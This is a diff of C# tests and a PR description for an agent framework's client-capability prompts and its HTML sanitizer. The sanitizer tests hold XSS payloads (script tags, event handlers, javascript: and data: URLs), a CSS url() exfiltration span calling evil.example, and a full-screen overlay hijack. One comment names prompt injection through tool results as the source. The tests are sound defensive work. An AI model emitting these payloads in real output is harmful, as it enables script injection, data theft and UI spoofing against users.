         // Mirror intermediate progress to stderr so callers piping stdout get
@@ -120,7 +121,8 @@ internal sealed class ChatCommand : AsyncCommand<ChatCommand.Settings>
                 Content = input,
                 SessionId = sessionId,
                 UserId = userId,
-                TargetAgent = settings.TargetAgent
+                TargetAgent = settings.TargetAgent,
+                ClientCapabilities = ClientCapabilityPresets.Cli
             };
 
             string? progressText = null;

--- a/tests/RockBot.A2A.Tests/A2ATaskResultHandlerTests.cs
+++ b/tests/RockBot.A2A.Tests/A2ATaskResultHandlerTests.cs
@@ -46,6 +46,7 @@ public class A2ATaskResultHandlerTests
             agentNameHolder: _nameHolder,
             inputRequiredHandler: null!,
             a2aOptions: _options,
+            clientCapabilityStore: new SessionClientCapabilityStore(),
             logger: NullLogger<A2ATaskResultHandler>.Instance);
 
     private void TrackPending() =>

--- a/tests/RockBot.Host.Tests/ClientCapabilityPromptBuilderTests.cs
+++ b/tests/RockBot.Host.Tests/ClientCapabilityPromptBuilderTests.cs
@@ -59,6 +59,8 @@ public sealed class ClientCapabilityPromptBuilderTests
         StringAssert.Contains(snippet, "GFM-style tables");
         StringAssert.Contains(snippet, "fenced code blocks");
         StringAssert.Contains(snippet, "inline links");
+        StringAssert.Contains(snippet, "strikethrough");
+        StringAssert.Contains(snippet, "task-list");
         StringAssert.Contains(snippet, "inline HTML");
         StringAssert.Contains(snippet, "inline `<svg>`");
         // Blazor allows everything in this subset — no markdown-feature deny lines should appear.
@@ -67,6 +69,19 @@ public sealed class ClientCapabilityPromptBuilderTests
             "Blazor supports headings; the deny line must not appear");
         Assert.IsFalse(snippet.Contains("present tabular data as a bulleted"),
             "Blazor supports tables; the deny line must not appear");
+    }
+
+    [TestMethod]
+    public void Build_Strikethrough_Alone_AddsAllowLine()
+    {
+        var snippet = ClientCapabilityPromptBuilder.Build(
+            ClientCapabilities.Text | ClientCapabilities.MarkdownBasic |
+            ClientCapabilities.MarkdownStrikethrough);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "strikethrough");
+        StringAssert.Contains(snippet, "~~text~~");
+        Assert.IsFalse(snippet.Contains("task-list"), "Task-list line must not leak in");
     }
 
     [TestMethod]

--- a/tests/RockBot.Host.Tests/ClientCapabilityPromptBuilderTests.cs
+++ b/tests/RockBot.Host.Tests/ClientCapabilityPromptBuilderTests.cs
@@ -1,0 +1,104 @@
+using RockBot.UserProxy;
+
+namespace RockBot.Host.Tests;
+
+[TestClass]
+public sealed class ClientCapabilityPromptBuilderTests
+{
+    [TestMethod]
+    public void Build_None_ReturnsNull()
+    {
+        Assert.IsNull(ClientCapabilityPromptBuilder.Build(ClientCapabilities.None));
+    }
+
+    [TestMethod]
+    public void Build_TextOnly_ReturnsNull()
+    {
+        // Text alone is the implicit floor — no opt-in beyond plain text, so the
+        // builder returns null and AgentContextBuilder skips prompt injection.
+        Assert.IsNull(ClientCapabilityPromptBuilder.Build(ClientCapabilities.Text));
+    }
+
+    [TestMethod]
+    public void Build_OnlyUnknownNativeUi_DoesNotReturnNull()
+    {
+        // Reserved native-UI bits still count as a meaningful opt-in even though no
+        // emitter tooling exists for them yet — the prompt acknowledges them.
+        var snippet = ClientCapabilityPromptBuilder.Build(
+            ClientCapabilities.Text | ClientCapabilities.DiscordEmbed);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "platform-native UI primitives");
+    }
+
+    [TestMethod]
+    public void Build_CliPreset_AllowsBasicAndCode_DeniesHeadingsTablesLinks()
+    {
+        var snippet = ClientCapabilityPromptBuilder.Build(ClientCapabilityPresets.Cli);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "bold");
+        StringAssert.Contains(snippet, "fenced code blocks");
+        // CLI preset omits headings/tables/inline-link — the deny list should call them out.
+        StringAssert.Contains(snippet, "headings");
+        StringAssert.Contains(snippet, "tables");
+        StringAssert.Contains(snippet, "auto-link");
+        // No HTML / SVG mention for CLI
+        Assert.IsFalse(snippet.Contains("inline HTML"), "CLI must not be told it can emit inline HTML");
+        Assert.IsFalse(snippet.Contains("inline `<svg>`"), "CLI must not be told it can emit inline SVG");
+    }
+
+    [TestMethod]
+    public void Build_BlazorPreset_AllowsRichSet_NoConflictingDeny()
+    {
+        var snippet = ClientCapabilityPromptBuilder.Build(ClientCapabilityPresets.Blazor);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "bold");
+        StringAssert.Contains(snippet, "headings");
+        StringAssert.Contains(snippet, "GFM-style tables");
+        StringAssert.Contains(snippet, "fenced code blocks");
+        StringAssert.Contains(snippet, "inline links");
+        StringAssert.Contains(snippet, "inline HTML");
+        StringAssert.Contains(snippet, "inline `<svg>`");
+        // Blazor allows everything in this subset — no markdown-feature deny lines should appear.
+        // Only the HTML safety deny line should be present.
+        Assert.IsFalse(snippet.Contains("the client renders `#` as a literal"),
+            "Blazor supports headings; the deny line must not appear");
+        Assert.IsFalse(snippet.Contains("present tabular data as a bulleted"),
+            "Blazor supports tables; the deny line must not appear");
+    }
+
+    [TestMethod]
+    public void Build_HtmlInline_IncludesSanitizerDenyList()
+    {
+        var snippet = ClientCapabilityPromptBuilder.Build(
+            ClientCapabilities.Text | ClientCapabilities.MarkdownBasic | ClientCapabilities.HtmlInline);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "<script>");
+        StringAssert.Contains(snippet, "<iframe>");
+        StringAssert.Contains(snippet, "event handlers");
+    }
+
+    [TestMethod]
+    public void Build_NoBasicMarkdown_DeniesAllFormatting()
+    {
+        // Edge case: caller sets only HtmlInline without MarkdownBasic. The prompt
+        // should still gate plain-text-only at the markdown level.
+        var snippet = ClientCapabilityPromptBuilder.Build(
+            ClientCapabilities.Text | ClientCapabilities.HtmlInline);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "plain text only");
+    }
+
+    [TestMethod]
+    public void Build_OutputEndsWithDefaultReminder()
+    {
+        var snippet = ClientCapabilityPromptBuilder.Build(ClientCapabilityPresets.Blazor);
+
+        Assert.IsNotNull(snippet);
+        StringAssert.Contains(snippet, "Plain markdown remains the default");
+    }
+}

--- a/tests/RockBot.Host.Tests/FileScheduledTaskStoreTests.cs
+++ b/tests/RockBot.Host.Tests/FileScheduledTaskStoreTests.cs
@@ -70,6 +70,54 @@ public sealed class FileScheduledTaskStoreTests
         Assert.IsNull(result);
     }
 
+    [TestMethod]
+    public async Task SaveAsync_PreservesClientCapabilities()
+    {
+        var store = CreateStore();
+        var task = new ScheduledTask(
+            Name: "rich-summary",
+            CronExpression: "0 8 * * *",
+            Description: "Daily summary with charts",
+            CreatedAt: DateTimeOffset.UtcNow,
+            ClientCapabilities: RockBot.UserProxy.ClientCapabilityPresets.Blazor);
+
+        await store.SaveAsync(task);
+        var retrieved = await store.GetAsync("rich-summary");
+
+        Assert.IsNotNull(retrieved);
+        Assert.AreEqual(RockBot.UserProxy.ClientCapabilityPresets.Blazor, retrieved.ClientCapabilities);
+    }
+
+    [TestMethod]
+    public async Task GetAsync_LegacyFileWithoutClientCapabilities_DefaultsToNone()
+    {
+        // Files persisted before the ClientCapabilities field was added should round-trip
+        // with the default value, not blow up deserialization. The on-disk format is a
+        // JSON array of tasks (see FileScheduledTaskStore.WriteAllAsync).
+        var filePath = Path.Combine(_tempDir, "scheduled-tasks.json");
+        await File.WriteAllTextAsync(filePath,
+            """
+            [
+              {
+                "name": "legacy-task",
+                "cronExpression": "0 8 * * *",
+                "description": "Pre-capability task",
+                "createdAt": "2026-01-01T00:00:00+00:00",
+                "lastFiredAt": null,
+                "runOnce": false,
+                "isSystemTask": false,
+                "directive": null
+              }
+            ]
+            """);
+        var store = new FileScheduledTaskStore(filePath, NullLogger<FileScheduledTaskStore>.Instance);
+
+        var retrieved = await store.GetAsync("legacy-task");
+
+        Assert.IsNotNull(retrieved);
+        Assert.AreEqual(RockBot.UserProxy.ClientCapabilities.None, retrieved.ClientCapabilities);
+    }
+
     // ── ListAsync ─────────────────────────────────────────────────────────────
 
     [TestMethod]

--- a/tests/RockBot.Host.Tests/SessionClientCapabilityStoreTests.cs
+++ b/tests/RockBot.Host.Tests/SessionClientCapabilityStoreTests.cs
@@ -1,0 +1,91 @@
+using RockBot.UserProxy;
+
+namespace RockBot.Host.Tests;
+
+[TestClass]
+public sealed class SessionClientCapabilityStoreTests
+{
+    [TestMethod]
+    public void Get_ReturnsNone_WhenSessionUnknown()
+    {
+        var store = new SessionClientCapabilityStore();
+
+        Assert.AreEqual(ClientCapabilities.None, store.Get("unseen-session"));
+    }
+
+    [TestMethod]
+    public void Set_Then_Get_ReturnsStoredValue()
+    {
+        var store = new SessionClientCapabilityStore();
+
+        store.Set("s1", ClientCapabilityPresets.Blazor);
+
+        Assert.AreEqual(ClientCapabilityPresets.Blazor, store.Get("s1"));
+    }
+
+    [TestMethod]
+    public void Set_LastWriterWins()
+    {
+        var store = new SessionClientCapabilityStore();
+        store.Set("s1", ClientCapabilityPresets.Cli);
+
+        store.Set("s1", ClientCapabilityPresets.Blazor);
+
+        Assert.AreEqual(ClientCapabilityPresets.Blazor, store.Get("s1"));
+    }
+
+    [TestMethod]
+    public void Set_None_RemovesEntry()
+    {
+        var store = new SessionClientCapabilityStore();
+        store.Set("s1", ClientCapabilityPresets.Blazor);
+
+        store.Set("s1", ClientCapabilities.None);
+
+        // Missing entry and None-entry behave identically per the store invariant.
+        Assert.AreEqual(ClientCapabilities.None, store.Get("s1"));
+    }
+
+    [TestMethod]
+    public void Clear_RemovesEntry()
+    {
+        var store = new SessionClientCapabilityStore();
+        store.Set("s1", ClientCapabilityPresets.Blazor);
+
+        store.Clear("s1");
+
+        Assert.AreEqual(ClientCapabilities.None, store.Get("s1"));
+    }
+
+    [TestMethod]
+    public void Clear_UnknownSession_DoesNotThrow()
+    {
+        var store = new SessionClientCapabilityStore();
+
+        store.Clear("never-set");
+
+        Assert.AreEqual(ClientCapabilities.None, store.Get("never-set"));
+    }
+
+    [TestMethod]
+    public void SessionIds_AreCaseInsensitive()
+    {
+        var store = new SessionClientCapabilityStore();
+        store.Set("Session-A", ClientCapabilityPresets.Blazor);
+
+        Assert.AreEqual(ClientCapabilityPresets.Blazor, store.Get("session-a"));
+        Assert.AreEqual(ClientCapabilityPresets.Blazor, store.Get("SESSION-A"));
+    }
+
+    [TestMethod]
+    public void DistinctSessions_AreIsolated()
+    {
+        var store = new SessionClientCapabilityStore();
+
+        store.Set("a", ClientCapabilityPresets.Cli);
+        store.Set("b", ClientCapabilityPresets.Blazor);
+
+        Assert.AreEqual(ClientCapabilityPresets.Cli, store.Get("a"));
+        Assert.AreEqual(ClientCapabilityPresets.Blazor, store.Get("b"));
+    }
+}

--- a/tests/RockBot.Subagent.Tests/SubagentManagerTests.cs
+++ b/tests/RockBot.Subagent.Tests/SubagentManagerTests.cs
@@ -62,9 +62,10 @@ public class SubagentManagerTests
         services.AddSingleton<ISystemPromptBuilder>(new DefaultSystemPromptBuilder(profileHolder, nameHolder, Microsoft.Extensions.Options.Options.Create(new AgentProfileOptions())));
         services.AddSingleton<IRulesStore>(new NoopRulesStore());
         services.AddSingleton<IConversationMemory>(new NoopConversationMemory());
-        services.AddSingleton<InjectedMemoryTracker>();
+                services.AddSingleton<InjectedMemoryTracker>();
         services.AddSingleton<SkillIndexTracker>();
         services.AddSingleton<SkillRecallTracker>();
+        services.AddSingleton<SessionClientCapabilityStore>();
         services.AddTransient<AgentContextBuilder>();
 
         // TierRoutingLogger requires a writable directory; point it at a temp folder

--- a/tests/RockBot.UserProxy.Blazor.Tests/SafeMarkdownRendererTests.cs
+++ b/tests/RockBot.UserProxy.Blazor.Tests/SafeMarkdownRendererTests.cs
@@ -1,0 +1,281 @@
+using RockBot.UserProxy.Blazor.Services;
+
+namespace RockBot.UserProxy.Blazor.Tests;
+
+/// <summary>
+/// Verifies <see cref="SafeMarkdownRenderer"/> renders the rich subset the agent is
+/// permitted to emit and strips the vectors the design doc calls out: classic XSS
+/// (script/iframe/event handlers), CSS-based data exfil (url() in style), UI hijack
+/// (position/z-index/transform/opacity), and unsafe URL schemes.
+/// </summary>
+[TestClass]
+public class SafeMarkdownRendererTests
+{
+    // ── Allowed: rich rendering subset ────────────────────────────────────
+
+    [TestMethod]
+    public void Renders_BasicMarkdown()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe("**bold** and *italic*");
+
+        StringAssert.Contains(html, "<strong>bold</strong>");
+        StringAssert.Contains(html, "<em>italic</em>");
+    }
+
+    [TestMethod]
+    public void Renders_FencedCode()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe("```csharp\nvar x = 1;\n```");
+
+        StringAssert.Contains(html, "<code");
+        StringAssert.Contains(html, "var x = 1;");
+    }
+
+    [TestMethod]
+    public void Renders_GfmTables()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "| col1 | col2 |\n|------|------|\n| a    | b    |");
+
+        StringAssert.Contains(html, "<table");
+        StringAssert.Contains(html, "<th>col1</th>");
+        StringAssert.Contains(html, "<td>a</td>");
+    }
+
+    [TestMethod]
+    public void Renders_Strikethrough()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe("~~deleted~~");
+
+        StringAssert.Contains(html, "<del>deleted</del>");
+    }
+
+    [TestMethod]
+    public void Renders_TaskList_AsDisabledCheckboxes()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe("- [x] done\n- [ ] todo");
+
+        StringAssert.Contains(html, "type=\"checkbox\"");
+        StringAssert.Contains(html, "disabled");
+        StringAssert.Contains(html, "checked");
+    }
+
+    [TestMethod]
+    public void Renders_InlineSvg()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<svg width=\"100\" height=\"100\" viewBox=\"0 0 100 100\">" +
+            "<circle cx=\"50\" cy=\"50\" r=\"40\" fill=\"red\" />" +
+            "</svg>");
+
+        StringAssert.Contains(html, "<svg");
+        StringAssert.Contains(html, "<circle");
+        StringAssert.Contains(html, "fill=\"red\"");
+    }
+
+    [TestMethod]
+    public void Renders_SafeColorSpan()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "Treat as <span style=\"color:red; font-weight:bold\">danger</span> please.");
+
+        StringAssert.Contains(html, "<span");
+        StringAssert.Contains(html, "color");
+        StringAssert.Contains(html, "danger");
+    }
+
+    [TestMethod]
+    public void Renders_Details_Summary()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<details><summary>click</summary>hidden content</details>");
+
+        StringAssert.Contains(html, "<details>");
+        StringAssert.Contains(html, "<summary>click</summary>");
+    }
+
+    // ── Stripped: classic XSS vectors ─────────────────────────────────────
+
+    [TestMethod]
+    public void Strips_ScriptTag()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe("hi <script>alert(1)</script> there");
+
+        Assert.IsFalse(html.Contains("<script"), $"Script tag must be stripped. Got: {html}");
+        Assert.IsFalse(html.Contains("alert(1)"), $"Script content must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_IframeTag()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<iframe src=\"https://evil.example\"></iframe>");
+
+        Assert.IsFalse(html.Contains("<iframe"), $"Iframe must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_StyleTag()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<style>body { display:none }</style>visible");
+
+        Assert.IsFalse(html.Contains("<style"), $"Style tag must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_OnclickAttribute()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<span onclick=\"alert(1)\">click me</span>");
+
+        Assert.IsFalse(html.Contains("onclick"), $"onclick must be stripped. Got: {html}");
+        Assert.IsFalse(html.Contains("alert(1)"), $"Handler body must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_OnerrorAttribute()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<img src=x onerror=\"alert(1)\">");
+
+        Assert.IsFalse(html.Contains("onerror"), $"onerror must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_JavascriptUrlScheme()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "[click](javascript:alert(1))");
+
+        Assert.IsFalse(html.Contains("javascript:"),
+            $"javascript: scheme must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_DataUrlScheme()
+    {
+        // data: URLs can host inline HTML or JS-equivalent (data:text/html,...).
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "[click](data:text/html,<script>alert(1)</script>)");
+
+        Assert.IsFalse(html.Contains("data:"),
+            $"data: scheme must be stripped. Got: {html}");
+    }
+
+    // ── Stripped: CSS-based data exfil ────────────────────────────────────
+
+    [TestMethod]
+    public void Strips_CssUrlInBackground()
+    {
+        // Primary CSS-exfil vector — agent (or prompt-injection through tool result)
+        // produces <span style="background:url(https://evil/leak?session=...)">.
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<span style=\"background:url(https://evil.example/leak?s=abc)\">x</span>");
+
+        Assert.IsFalse(html.Contains("url("),
+            $"url() in CSS must be stripped. Got: {html}");
+        Assert.IsFalse(html.Contains("evil.example"),
+            $"External URL must not survive the sanitizer. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_CssUrlInBackgroundImage()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<span style=\"background-image:url(https://evil.example/leak.png)\">x</span>");
+
+        Assert.IsFalse(html.Contains("background-image"),
+            $"background-image with url() must be dropped. Got: {html}");
+    }
+
+    // ── Stripped: UI-hijack CSS ───────────────────────────────────────────
+
+    [TestMethod]
+    public void Strips_PositionFixed_FullScreenOverlay()
+    {
+        // The classic UI hijack: full-screen white overlay with a fake message.
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<div style=\"position:fixed; top:0; left:0; width:100%; height:100%; " +
+            "z-index:99999; background:white\">Your session expired</div>");
+
+        Assert.IsFalse(html.Contains("position"),
+            $"CSS position must be dropped. Got: {html}");
+        Assert.IsFalse(html.Contains("z-index"),
+            $"CSS z-index must be dropped. Got: {html}");
+        Assert.IsFalse(html.Contains("top:"),
+            $"CSS top/left must be dropped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_TransformAndOpacity()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<span style=\"transform:scale(100); opacity:0.01\">invisible</span>");
+
+        Assert.IsFalse(html.Contains("transform"),
+            $"transform must be dropped (UI hijack). Got: {html}");
+        Assert.IsFalse(html.Contains("opacity"),
+            $"opacity must be dropped (UI hijack). Got: {html}");
+    }
+
+    // ── Stripped: SVG-specific attack surface ─────────────────────────────
+
+    [TestMethod]
+    public void Strips_ScriptInsideSvg()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<svg><script>alert(1)</script><circle cx=\"50\" cy=\"50\" r=\"40\" /></svg>");
+
+        Assert.IsFalse(html.Contains("<script"),
+            $"Script inside SVG must be stripped. Got: {html}");
+        // The legitimate <circle> should survive.
+        StringAssert.Contains(html, "<circle");
+    }
+
+    [TestMethod]
+    public void Strips_ForeignObjectInsideSvg()
+    {
+        // <foreignObject> would smuggle arbitrary HTML inside SVG past most allowlists.
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<svg><foreignObject><div onclick=\"alert(1)\">hi</div></foreignObject></svg>");
+
+        Assert.IsFalse(html.Contains("foreignObject"),
+            $"foreignObject must be stripped from SVG. Got: {html}");
+        Assert.IsFalse(html.Contains("onclick"),
+            $"Smuggled event handler must be stripped. Got: {html}");
+    }
+
+    [TestMethod]
+    public void Strips_SvgOnloadEventHandler()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe(
+            "<svg onload=\"alert(1)\"><circle cx=\"50\" cy=\"50\" r=\"40\" /></svg>");
+
+        Assert.IsFalse(html.Contains("onload"),
+            $"SVG onload handler must be stripped. Got: {html}");
+        StringAssert.Contains(html, "<svg");   // legitimate svg survives
+    }
+
+    // ── Edge cases ────────────────────────────────────────────────────────
+
+    [TestMethod]
+    public void Empty_ReturnsEmpty()
+    {
+        Assert.AreEqual(string.Empty, SafeMarkdownRenderer.RenderSafe(string.Empty));
+    }
+
+    [TestMethod]
+    public void Null_ReturnsEmpty()
+    {
+        Assert.AreEqual(string.Empty, SafeMarkdownRenderer.RenderSafe(null));
+    }
+
+    [TestMethod]
+    public void PlainText_PassesThrough()
+    {
+        var html = SafeMarkdownRenderer.RenderSafe("just plain text");
+
+        StringAssert.Contains(html, "just plain text");
+    }
+}

--- a/tests/RockBot.UserProxy.Tests/ClientCapabilitiesTests.cs
+++ b/tests/RockBot.UserProxy.Tests/ClientCapabilitiesTests.cs
@@ -47,6 +47,8 @@ public sealed class ClientCapabilitiesTests
         var preset = ClientCapabilityPresets.Blazor;
 
         Assert.IsTrue(preset.HasFlag(ClientCapabilities.MarkdownTables));
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.MarkdownStrikethrough));
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.MarkdownTaskList));
         Assert.IsTrue(preset.HasFlag(ClientCapabilities.HtmlInline));
         Assert.IsTrue(preset.HasFlag(ClientCapabilities.SvgInline));
         Assert.IsFalse(preset.HasFlag(ClientCapabilities.ImageAttachment),
@@ -64,6 +66,32 @@ public sealed class ClientCapabilitiesTests
             "CLI preset must not advertise HTML — a terminal cannot render it");
         Assert.IsFalse(preset.HasFlag(ClientCapabilities.SvgInline));
         Assert.IsFalse(preset.HasFlag(ClientCapabilities.MarkdownTables));
+        Assert.IsFalse(preset.HasFlag(ClientCapabilities.MarkdownStrikethrough),
+            "Terminals don't render `~~text~~` — leave it as literal characters");
+        Assert.IsFalse(preset.HasFlag(ClientCapabilities.MarkdownTaskList));
+    }
+
+    [TestMethod]
+    public void ChatPlatformPresets_AllAdvertiseStrikethrough()
+    {
+        // Strikethrough is the one GFM-beyond-CommonMark feature universally supported
+        // across Discord / Slack / WhatsApp / Teams. The presets should reflect that.
+        Assert.IsTrue(ClientCapabilityPresets.Discord.HasFlag(ClientCapabilities.MarkdownStrikethrough));
+        Assert.IsTrue(ClientCapabilityPresets.Slack.HasFlag(ClientCapabilities.MarkdownStrikethrough));
+        Assert.IsTrue(ClientCapabilityPresets.WhatsApp.HasFlag(ClientCapabilities.MarkdownStrikethrough));
+        Assert.IsTrue(ClientCapabilityPresets.Teams.HasFlag(ClientCapabilities.MarkdownStrikethrough));
+    }
+
+    [TestMethod]
+    public void TaskList_IsTeamsAndBlazorOnly_AmongDeclaredPresets()
+    {
+        // Task-list checkboxes are rendered natively only by Markdig advanced (Blazor)
+        // and Teams. Other chat platforms show them as literal `- [ ]`.
+        Assert.IsTrue(ClientCapabilityPresets.Blazor.HasFlag(ClientCapabilities.MarkdownTaskList));
+        Assert.IsTrue(ClientCapabilityPresets.Teams.HasFlag(ClientCapabilities.MarkdownTaskList));
+        Assert.IsFalse(ClientCapabilityPresets.Discord.HasFlag(ClientCapabilities.MarkdownTaskList));
+        Assert.IsFalse(ClientCapabilityPresets.Slack.HasFlag(ClientCapabilities.MarkdownTaskList));
+        Assert.IsFalse(ClientCapabilityPresets.WhatsApp.HasFlag(ClientCapabilities.MarkdownTaskList));
     }
 
     [TestMethod]

--- a/tests/RockBot.UserProxy.Tests/ClientCapabilitiesTests.cs
+++ b/tests/RockBot.UserProxy.Tests/ClientCapabilitiesTests.cs
@@ -1,0 +1,94 @@
+using RockBot.Messaging;
+
+namespace RockBot.UserProxy.Tests;
+
+[TestClass]
+public sealed class ClientCapabilitiesTests
+{
+    [TestMethod]
+    public void UserMessage_DefaultsClientCapabilities_ToNone()
+    {
+        var message = new UserMessage { Content = "x", SessionId = "s", UserId = "u" };
+
+        Assert.AreEqual(ClientCapabilities.None, message.ClientCapabilities);
+    }
+
+    [TestMethod]
+    public void UserMessage_RoundTrips_ClientCapabilities()
+    {
+        var original = new UserMessage
+        {
+            Content = "Hello",
+            SessionId = "s1",
+            UserId = "u1",
+            ClientCapabilities = ClientCapabilityPresets.Blazor
+        };
+
+        var envelope = original.ToEnvelope<UserMessage>(source: "proxy");
+        var deserialized = envelope.GetPayload<UserMessage>();
+
+        Assert.IsNotNull(deserialized);
+        Assert.AreEqual(ClientCapabilityPresets.Blazor, deserialized.ClientCapabilities);
+    }
+
+    [TestMethod]
+    public void ClientCapabilities_FlagsCombine_AsBitwiseOr()
+    {
+        var combined = ClientCapabilities.MarkdownBasic | ClientCapabilities.HtmlInline;
+
+        Assert.IsTrue(combined.HasFlag(ClientCapabilities.MarkdownBasic));
+        Assert.IsTrue(combined.HasFlag(ClientCapabilities.HtmlInline));
+        Assert.IsFalse(combined.HasFlag(ClientCapabilities.SvgInline));
+    }
+
+    [TestMethod]
+    public void BlazorPreset_IncludesRichRendering()
+    {
+        var preset = ClientCapabilityPresets.Blazor;
+
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.MarkdownTables));
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.HtmlInline));
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.SvgInline));
+        Assert.IsFalse(preset.HasFlag(ClientCapabilities.ImageAttachment),
+            "Blazor preset should not declare ImageAttachment until AgentReply.Attachments lands");
+    }
+
+    [TestMethod]
+    public void CliPreset_IsMarkdownOnly()
+    {
+        var preset = ClientCapabilityPresets.Cli;
+
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.MarkdownBasic));
+        Assert.IsTrue(preset.HasFlag(ClientCapabilities.MarkdownCode));
+        Assert.IsFalse(preset.HasFlag(ClientCapabilities.HtmlInline),
+            "CLI preset must not advertise HTML — a terminal cannot render it");
+        Assert.IsFalse(preset.HasFlag(ClientCapabilities.SvgInline));
+        Assert.IsFalse(preset.HasFlag(ClientCapabilities.MarkdownTables));
+    }
+
+    [TestMethod]
+    public void Enum_SerializesAsInteger_ForCompactWireFormat()
+    {
+        // Default System.Text.Json options serialize flags enums numerically — this is
+        // load-bearing for the design's "minimal wire footprint" guarantee. If a global
+        // JsonStringEnumConverter were ever added, the integer would inflate to a string
+        // like "MarkdownBasic, HtmlInline, SvgInline" and balloon the wire size.
+        var message = new UserMessage
+        {
+            Content = "x",
+            SessionId = "s",
+            UserId = "u",
+            ClientCapabilities = ClientCapabilityPresets.Blazor
+        };
+
+        var envelope = message.ToEnvelope<UserMessage>(source: "proxy");
+        var jsonBody = System.Text.Encoding.UTF8.GetString(envelope.Body.Span);
+
+        // Expect a number like "clientCapabilities":131 (or whatever bits add up to).
+        // The exact value isn't asserted — what matters is the absence of textual flag names.
+        Assert.IsTrue(jsonBody.Contains("\"clientCapabilities\":"),
+            $"Body should contain the clientCapabilities key. Body was: {jsonBody}");
+        Assert.IsFalse(jsonBody.Contains("MarkdownBasic"),
+            $"Body should not contain the textual flag names. Body was: {jsonBody}");
+    }
+}


### PR DESCRIPTION
## Summary

- Adds a `ClientCapabilities` `[Flags]` enum that each user-proxy declares per-message on `UserMessage`. The agent translates the bitfield into a system-prompt snippet (allow/deny list) via `ClientCapabilityPromptBuilder`, scoping the rich-content subset it emits — color spans, inline SVG, GFM tables, strikethrough, task lists, etc.
- A new `SessionClientCapabilityStore` caches the live-session capabilities so A2A handlers and `SubagentRunner` (which produce replies without the originating `UserMessage` in scope) honour the user's currently-active surface. `ScheduledTask` carries its own `ClientCapabilities` field for author-time intent — scheduled audience is unpredictable so the stash isn't consulted there.
- Blazor renders agent output through a new `SafeMarkdownRenderer` (Markdig + `Ganss.Xss` sanitizer) at all four `(MarkupString)` sites. Allowlist permits the rich subset the agent is invited to emit; denies classic XSS (`<script>`, `<iframe>`, event handlers, `javascript:`/`data:`/`vbscript:` URLs), CSS-based data exfil (`url()` in style), UI-hijack CSS (`position`/`z-index`/`transform`/`opacity`/fixed sizing), and SVG-smuggled HTML (`<foreignObject>` + `on*` handlers inside SVG).
- `schedule_task` LLM tool grows an optional `outputFormat: "plain"|"markdown"|"rich"` parameter that maps to a sensible preset.

See `design/client-rendering-capabilities.md` for the full design.

## Test plan
- [x] `dotnet build RockBot.slnx` (clean)
- [x] `dotnet test RockBot.slnx` — all 17 projects green
- [x] Tested live on local k8s cluster at 0.11.1 (Blazor preset, capability propagation to subagent, SVG/HTML/span rendering, sanitizer stripping `<script>`/UI-hijack CSS)
- [ ] Reviewer: confirm `Ganss.Xss` allowlist matches your security posture
- [ ] Reviewer: consider whether `MarkdownStrikethrough`/`MarkdownTaskList` should also flow into the chat-platform presets in your downstream proxy work

## Deferred (documented in design doc)
- `AgentReply.Attachments` for `ImageAttachment` capability
- Platform-native UI emitters (`DiscordEmbed`, `SlackBlockKit`, `TeamsAdaptiveCard`)
- `SavedResponseTools` for agent-callable saved-response writes
- Per-schedule audience filter / targeted delivery

🤖 Generated with [Claude Code](https://claude.com/claude-code)